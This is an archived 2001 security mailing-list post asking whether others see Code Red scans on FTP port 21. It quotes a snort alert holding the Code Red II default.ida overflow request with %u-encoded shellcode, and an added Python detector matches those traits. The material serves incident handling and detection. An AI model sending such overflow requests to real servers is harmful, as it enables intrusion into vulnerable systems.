Anyone else seeing Code Red scans to port 21 (ftp)? Found this in my snort log:

CID:2493 [**] LOCAL/FTP Attempt [**]
2001-09-08 09:57:59 213.160.60.187:3125 -> 64.x.x.x:21
TCP TTL:105 TOS:0x0 ID:48568 IPLen: DgmLen:48 HLen:5 CSumIP:0x6049
******S* Seq:0x178AEF6A Ack:0x0 Win:0x4000 CSumTCP:0x3C1A
TCP Options (4) => MSS:05B4 NO-OP NO-OP SACKOK

Payload (ASCII):
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379
[binary payload body omitted]

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
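Detection logic for the request pattern in the alert above, added here as an example and not part of the original post: it parses a snort-style alert header, looks for the Code Red II traits visible in the ASCII payload (the default.ida request, the %u-encoded run, the text/xml body of length 3379) and flags that this HTTP exploit request was aimed at a non-HTTP port. The alert text is constructed, with the 224-byte X run abridged and a placeholder destination address.

```python
import re

# Constructed sample in the layout of the snort alert quoted above; the 'X' run
# is abridged and the destination address is a placeholder (192.0.2.10).
SAMPLE_ALERT = """[**] LOCAL/FTP Attempt [**]
2001-09-08 09:57:59 213.160.60.187:3125 -> 192.0.2.10:21 TCP TTL:105 TOS:0x0 ID:48568
Payload (ASCII): GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379
"""

HEADER_RE = re.compile(
    r"(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>\w+)"
)
HTTP_PORTS = {80, 443, 8080}  # ports where an HTTP request is expected

def parse_header(alert: str) -> dict:
    """Pull timestamp, endpoints and protocol out of the snort alert header."""
    m = HEADER_RE.search(alert)
    if not m:
        raise ValueError("no snort header line found")
    h = m.groupdict()
    h["sport"], h["dport"] = int(h["sport"]), int(h["dport"])
    return h

def payload_indicators(alert: str) -> list:
    """Return the Code Red II request traits present in the ASCII payload."""
    body = alert.split("Payload (ASCII):", 1)[-1]
    found = []
    if re.search(r"GET /default\.ida\?X+", body):
        found.append("default.ida request with X padding")  # .ida overflow path
    if re.search(r"(%u[0-9a-fA-F]{4}){4,}", body):
        found.append("%u overlong encoding run")  # IIS-only %uNNNN syntax
    if "%u9090%u6858%ucbd3%u7801" in body:
        found.append("code red ii %u prefix")
    if "Content-type: text/xml" in body and "Content-length: 3379" in body:
        found.append("text/xml body of length 3379")
    return found

def assess(alert: str) -> dict:
    """Combine header and payload checks; note HTTP exploit traffic sent to a non-HTTP port."""
    header = parse_header(alert)
    indicators = payload_indicators(alert)
    off_port = bool(indicators) and header["dport"] not in HTTP_PORTS
    verdict = "code-red-ii-like" if len(indicators) >= 2 else "no match"
    return {"header": header, "indicators": indicators,
            "http_to_non_http_port": off_port, "verdict": verdict}

if __name__ == "__main__":
    print(assess(SAMPLE_ALERT))
```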
This archive was generated by hypermail 2b30 : Sat Sep 08 2001 - 12:29:28 PDT